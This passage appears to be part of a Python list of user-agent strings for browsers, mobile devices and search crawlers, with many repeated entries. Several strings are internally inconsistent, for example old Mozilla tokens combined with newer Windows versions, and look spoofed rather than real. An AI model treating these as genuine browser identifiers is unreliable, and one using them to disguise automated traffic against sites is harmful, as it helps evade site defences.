'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
